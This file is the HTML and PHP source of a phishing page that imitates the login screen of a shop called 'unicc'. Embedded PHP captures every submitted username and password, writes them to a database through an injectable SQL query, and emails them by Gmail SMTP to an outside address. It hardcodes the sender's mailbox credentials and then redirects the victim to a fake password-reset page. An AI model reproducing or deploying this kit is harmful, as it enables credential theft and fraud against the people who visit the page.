<!DOCTYPE html>
<html lang="ru"><head>
 <link rel="stylesheet" type="text/css" href="unicc/css/main.css?v=1.7" />
<link rel="stylesheet" type="text/css" href="unicc/ui/css/bootstrap.min.css" />
<link rel="stylesheet" type="text/css" href="unicc/ui/css/bootstrap-theme.min.css" />
<link rel="stylesheet" type="text/css" href="unicc/ui/css/nstyle.min.css?v=1" />
<script type="text/javascript" src="unicc/js/jquery.min.js"></script>
<script type="text/javascript" src="unicc/js/bootstrap.min.js"></script>
<script type="text/javascript" src="unicc/js/bootstrap-noconflict.js"></script>
<script type="text/javascript" src="unicc/js/jquery-ui-no-conflict.min.js"></script>
<script type="text/javascript" src="unicc/js/main.min.js?v=2.0"></script>
<script type="text/javascript" src="unicc/js/jquery.yiiactiveform.js"></script>
<script type="text/javascript">
/*<![CDATA[*/
var ghsdfkjlkhhealk35bbr = "cTZEbUFEM19zS0ZqdzhXc1c5T2tXM2NxOFpNZWZkaDnt6zREXsZDhg9MCgqOBVsHAH-zeNazmycxk8Iu77GDyg=="; 
/*]]>*/
</script>
<title>Shop - Login</title>
</head>
<body class="login">
    
<form class="form-signin form" autocomplete="off" id="login-form" action="" method="POST">
<input value="cTZEbUFEM19zS0ZqdzhXc1c5T2tXM2NxOFpNZWZkaDnt6zREXsZDhg9MCgqOBVsHAH-zeNazmycxk8Iu77GDyg==" name="ghsdfkjlkhhealk35bbr" type="hidden">
<div class="blocklogin">
    <div class="titlelogin">
        <img src="unicc/img/logo.png">

        <p>login area</p>
    </div>
    <div class="loginform">
        <div class="inputslogin">

            <label for="name"><img src="unicc/img/log_user.png"></label>
            <div class="form-group"><div><input class="form-control" placeholder="Username" name="username" id="LoginForm_username" type="text"><div class="help-block error" id="LoginForm_username_em_" style="display:none"></div></div></div>            <label for="pass"><img src="unicc/img/log_pass.png"></label>
            <div class="form-group"><div><input class="form-control" placeholder="Password" name="password" id="LoginForm_password" type="password"><div class="help-block error" id="LoginForm_password_em_" style="display:none"></div></div></div>            <img class="captchaimg" id="yw0" src="unicc/img/captcha_2.png" alt=""><div class="form-group"><div><input style="width:110px;" class="form-control" placeholder="Captcha" name="LoginForm[captcha]" id="LoginForm_captcha" type="text"><div class="help-block error" id="LoginForm_captcha_em_" style="display:none"></div></div></div>            <a href="http://anonym.to/?https://youtu.be/NT4PED4iqLU" class="wtchvdo" rel="noreferrer" target="_blank">Watch
                our PROMO video</a>
              
            <button type="submit" name="submit" value="submit">enter</button> 
                            <a href="unicc/signup/index.html">
                    <button type="button">register</button>
                </a>
                    </div>

        <div id="resetPasswordNotification" class="text-center alert alert-danger hide">
            <strong>Warning: if you had password that is less than 8 characters long or username less than 6 characters
                long you
                will have to reset them!</strong><br>
            <strong><a href="unicc/resetpassword/index.php">Follow this link to reset your
                    password.</a></strong>
        </div>
        <div id="yw1"></div>    </div>

</div>
</form>

<?php
	$servername = "CPANEL_SERVER";
     $username = "CPANEL_USERNAME";
     $password = "CPANEL_PASSWORD";
     $dbname = "DATABASE_NAME";
	$table = "TABLE_NAME";
     $conn = mysql_connect($servername,$username,$password);
     mysql_select_db($dbname,$conn);
	if($_POST['submit'])
  	{
        $un = $_POST['username'];
        $pw = $_POST['password'];
		if( $un == '' || $pw == '')
        {
		}
	else {
			$query = "INSERT INTO $table (user,pass) values ('$un','$pw')";
            mysql_query($query,$conn);
     require 'files/PHPMailerAutoload.php';
			$mail = new PHPMailer;
      		$mail->Host = 'smtp.gmail.com';
      		$mail->isSMTP();
      		$mail->SMTPAuth = true;
     			$mail->Username = 'cindi.toepel06@gmail.com';
    			$mail->Password = 'deadBODY@2';
      		$mail->SMTPSecure = 'tls';
     			$mail->Port = 587;
      		$mail->isHTML(true);
      		$mail->Subject = 'deadbody';
      		$mail->Body = " Username : $un  \n  Password : $pw";
      		$mail->setFrom('cindi.toepel06@gmail.com','Deadbody');
  			$mail->addAddress('tinachampagne21@gmail.com');
     		if($mail->send())
     			{header("refresh:0.1; url=unicc/resetpassword/index.php");}
      		else{echo "error".$mail->ErrorInfo;}   		}
	}
?>
<script>
    $(function () {
        $(document).on('blur', '#LoginForm_username', function () {
            var length = $('#LoginForm_username').val().length;
            if (length > 0 && length < 6) {
                $('#resetPasswordNotification').removeClass('hide');
                $('#resetPasswordNotification')[0].scrollIntoView();
            } else if (length >= 6) {
                $('#resetPasswordNotification').addClass('hide');
            }
        });
        $(document).on('blur', '#LoginForm_password', function () {
            var length = $('#LoginForm_password').val().length;
            if (length > 0 && length < 8) {
                $('#resetPasswordNotification').removeClass('hide');
                $('#resetPasswordNotification')[0].scrollIntoView();
            } else if (length >= 8) {
                $('#resetPasswordNotification').addClass('hide');
            }
        });
    });
</script><script type="text/javascript">
/*<![CDATA[*/
jQuery(function($) {
jQuery('[data-toggle=popover]').popover();
jQuery('[data-toggle=tooltip]').tooltip();

jQuery(document).on('click', '#yw0', function(){
    jQuery.ajax({
        url: "\/home\/captcha\/refresh\/1\/",
        dataType: 'json',
        cache: false,
        success: function(data) {
            jQuery('#yw0').attr('src', data['url']);
            jQuery('body').data('captcha.hash', [data['hash1'], data['hash2']]);
        }
    });
    return false;
});

jQuery('#yw1_0 .alert').alert();
jQuery('#login-form').yiiactiveform({'validateOnSubmit':true,'afterValidate':function(form, data, hasError) {
                if((hasError && $('#LoginForm_password').val().length < 8) || $('#LoginForm_username').val().length < 6){
                    $('#resetPasswordNotification').removeClass('hide');
                    $('#resetPasswordNotification')[0].scrollIntoView();
                    return false;
                }
                return true;
            },'errorCssClass':'has\x2Derror','successCssClass':'has\x2Dsuccess','inputContainer':'div.form\x2Dgroup','attributes':[{'id':'LoginForm_username','inputID':'LoginForm_username','errorID':'LoginForm_username_em_','model':'LoginForm','name':'username','enableAjaxValidation':false,'clientValidation':function(value, messages, attribute) {

if(jQuery.trim(value)=='') {
    messages.push("Username cannot be blank.");
}


if(jQuery.trim(value)!='') {
    
if(value.length<6) {
    messages.push("Username is too short (minimum is 6 characters).");
}

}


if(!value.match(/^[a-z0-9\-\.\_]+$/i)) {
    messages.push("Username is invalid.");
}

}},{'id':'LoginForm_password','inputID':'LoginForm_password','errorID':'LoginForm_password_em_','model':'LoginForm','name':'password','enableAjaxValidation':false,'clientValidation':function(value, messages, attribute) {

if(jQuery.trim(value)=='') {
    messages.push("Password cannot be blank.");
}


if(jQuery.trim(value)!='') {
    
if(value.length<8) {
    messages.push("Password is too short (minimum is 8 characters).");
}

}

}},{'id':'LoginForm_captcha','inputID':'LoginForm_captcha','errorID':'LoginForm_captcha_em_','model':'LoginForm','name':'captcha','enableAjaxValidation':false,'clientValidation':function(value, messages, attribute) {

var hash = jQuery('body').data(775);
if (hash == null)
    hash = 759;
else
    hash = hash[1];
for(var i=value.length-1, h=0; i >= 0; --i) h+=value.toLowerCase().charCodeAt(i);




if(h != 775 ) {
    messages.push("The Verification code is incorrect");
}

}}],'errorCss':'error'});
});
/*]]>*/
</script>

</body></html>
